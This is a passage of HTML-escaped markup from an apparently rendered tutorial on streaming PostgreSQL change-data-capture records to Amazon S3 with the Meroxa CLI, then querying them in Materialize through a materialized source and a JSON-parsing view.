variable&quot;&gt;--metadata&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;{&quot;logical_replication&quot;:&quot;true&quot;}&apos;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;2. Add Amazon S3 resource:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa &lt;span class=&quot;token function&quot;&gt;add&lt;/span&gt; resource datalake &lt;span class=&quot;token parameter variable&quot;&gt;--type&lt;/span&gt; s3 &lt;span class=&quot;token parameter variable&quot;&gt;-u&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;s3://&lt;span class=&quot;token variable&quot;&gt;$AWS_ACCESS_KEY&lt;/span&gt;:&lt;span class=&quot;token variable&quot;&gt;$AWS_ACCESS_SECRET&lt;/span&gt;@&lt;span class=&quot;token variable&quot;&gt;$AWS_REGION&lt;/span&gt;/&lt;span class=&quot;token variable&quot;&gt;$AWS_S3_BUCKET&lt;/span&gt;&quot;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*4yAizncM0QltUIC5RQqeGQ.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;For more details about Meroxa Platform access, permissions, or environment-specific instructions, please see:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup&quot;&gt;PostgreSQL Documentation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/amazon-s3&quot;&gt;Amazon S3 Documentation&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Step 2: Building the pipeline&lt;/h3&gt;
&lt;p&gt;Now that you have a resource within your Meroxa Resource Catalog, we can connect them with the &lt;code class=&quot;language-text&quot;&gt;meroxa connect&lt;/code&gt; command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa connect &lt;span class=&quot;token parameter variable&quot;&gt;--from&lt;/span&gt; postgres &lt;span class=&quot;token parameter variable&quot;&gt;--input&lt;/span&gt; public.User &lt;span class=&quot;token parameter variable&quot;&gt;--to&lt;/span&gt; datalake&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*2etkdADYntI7awceuRi6_g.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;The &lt;code class=&quot;language-text&quot;&gt;meroxa connect&lt;/code&gt; command will create two connectors for you. Alternatively, you can use the &lt;code class=&quot;language-text&quot;&gt;meroxa create connector&lt;/code&gt; command to create each one separately.&lt;/p&gt;
&lt;p&gt;You can view the created connectors with the &lt;code class=&quot;language-text&quot;&gt;meroxa list connectors&lt;/code&gt; command:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*VXQvclDU0G8OPJxIVcdOiQ.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;After connecting the resources together, Meroxa will:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Analyze your resources and automatically configure the proper connectors.&lt;/li&gt;
&lt;li&gt;Perform initial data sync between source and destination.&lt;/li&gt;
&lt;li&gt;Track every insert, update, and delete from Postgres and send to S3 in real-time.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;If your pipeline creation was successful, in the S3 bucket you configured, you would see events captured:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*9Q47J94NV9F9oHnoaQfZjA.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;We can now add S3 as a source in Materialize.&lt;/p&gt;
&lt;h3&gt;Step 3: Add S3 as a Materialized Source&lt;/h3&gt;
&lt;p&gt;Instead of tables of data, you connect Materialize to external sources of data and then create materialized views of the data that Materialize sees from those sources.&lt;/p&gt;
&lt;p&gt;In this case, we can &lt;a href=&quot;https://materialize.com/docs/sql/create-source/json-s3/&quot;&gt;add our Amazon S3 bucket as a source&lt;/a&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;First, start the Materialize:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;materialized &lt;span class=&quot;token parameter variable&quot;&gt;-w&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Next, in another terminal, open &lt;code class=&quot;language-text&quot;&gt;psql&lt;/code&gt;:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;psql &lt;span class=&quot;token parameter variable&quot;&gt;-U&lt;/span&gt; materialize &lt;span class=&quot;token parameter variable&quot;&gt;-h&lt;/span&gt; localhost &lt;span class=&quot;token parameter variable&quot;&gt;-p&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;6875&lt;/span&gt; materialize&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Create the materialized source:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;CREATE&lt;/span&gt; MATERIALIZED SOURCE user_cdc_stream
&lt;span class=&quot;token keyword&quot;&gt;FROM&lt;/span&gt; S3 DISCOVER OBJECTS &lt;span class=&quot;token keyword&quot;&gt;USING&lt;/span&gt; BUCKET SCAN &lt;span class=&quot;token string&quot;&gt;&apos;bucket-name&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; SQS NOTIFICATIONS &lt;span class=&quot;token string&quot;&gt;&apos;bucket-notifications&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; COMPRESSION GZIP
&lt;span class=&quot;token keyword&quot;&gt;WITH&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;region &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;us-east-2&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
FORMAT &lt;span class=&quot;token keyword&quot;&gt;TEXT&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This command creates a source from a bucket in S3 called &lt;code class=&quot;language-text&quot;&gt;bucket-name&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;To listen to changes from S3, Materialize listens to Amazon SQS. Within the command above, we also configure an SQS queue called &lt;code class=&quot;language-text&quot;&gt;bucket-notifications&lt;/code&gt;. To create a queue: &lt;a href=&quot;https://docs.aws.amazon.com/AmazonS3/latest/userguide/ways-to-add-notification-config-to-bucket.html&quot;&gt;Amazon Walkthrough: Configuring a bucket for notifications (SNS topic or SQS queue)&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Lastly, we can inform Materialize that our files in S3 are compressed with &lt;code class=&quot;language-text&quot;&gt;GZIP&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;For more details on access/configuration, see &lt;a href=&quot;https://materialize.com/docs/sql/create-source/json-s3/&quot;&gt;Materialized S3 + JSON documentation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Now that we have a materialized source, we can query it like a table using SQL. For example, you can view the columns of our new table like so:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;SHOW&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;COLUMNS&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;FROM&lt;/span&gt; user_cdc_stream&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*0wxLjOekG42jXR8Z2ffvVA.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;The&lt;code class=&quot;language-text&quot;&gt;text&lt;/code&gt; column contains a single CDC record in the format we mentioned in Step 1.&lt;/p&gt;
&lt;h3&gt;Step 4: Create a Materialized View&lt;/h3&gt;
&lt;p&gt;Materialize views are built to handle streams of data and let you run super fast queries over that data. Using the following command, we can create a view to parse the JSON record and represent the information in columns:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;CREATE&lt;/span&gt; MATERIALIZED &lt;span class=&quot;token keyword&quot;&gt;VIEW&lt;/span&gt; user_cdc_table &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;SELECT&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;after&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;id&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;int&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; after_id&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;after&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;email&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;text&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; after_email&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;after&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;name&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;text&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; after_name&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;after&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;birthday&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;text&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; after_birthday&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;after&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;createdAt&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;bigint&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; after_createdAt&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;after&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;updatedAt&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;bigint&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; after_updatedAt&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;before&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;id&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;int&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; before_id&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;before&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;email&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;text&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; before_email&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;before&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;name&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;text&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; before_name&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;before&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;birthday&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;text&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; before_birthday&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;before&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;createdAt&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;bigint&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; before_createdAt&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;before&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;updatedAt&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;bigint&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; before_updatedAt&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;source&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;connector&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;text&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; source_connector&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;source&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;ts_ms&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;text&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; source_ts_ms&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;source&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;db&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;text&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; source_db&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;source&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;schema&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;text&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; source_schema&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;source&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;table&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;text&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; source_table&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;source&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;snapshot&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;text&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; source_snapshot&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
